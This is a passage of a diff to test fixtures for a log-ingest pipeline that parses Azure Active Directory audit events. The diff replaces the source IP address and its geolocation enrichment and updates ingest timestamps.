\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": 
\\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
 "code": "AzureActiveDirectory",
 "provider": "AzureActiveDirectory",
 "kind": "event",
@@ -569,25 +515,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -601,7 +529,7 @@
 "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -724,7 +652,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -736,12 +664,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036081200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"v
ersion\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1638042Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438642\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"b2cc2456-5ac5-4399-b960-82a40036476f\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124839500Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Val
ue\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1638042Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438642\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"b2cc2456-5ac5-4399-b960-82a40036476f\",\"ModifiedProperties\":[{\"Name\":\"Included Updated 
Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
 "code": "AzureActiveDirectory",
 "provider": "AzureActiveDirectory",
 "kind": "event",
@@ -767,25 +695,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -799,7 +709,7 @@
 "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -922,7 +832,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -934,12 +844,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036088500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"v
ersion\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1638042Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438642\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"b2cc2456-5ac5-4399-b960-82a40036476f\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124846300Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Val
ue\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1638042Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438642\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"b2cc2456-5ac5-4399-b960-82a40036476f\",\"ModifiedProperties\":[{\"Name\":\"Included Updated 
Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
 "code": "AzureActiveDirectory",
 "provider": "AzureActiveDirectory",
 "kind": "event",
@@ -965,25 +875,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
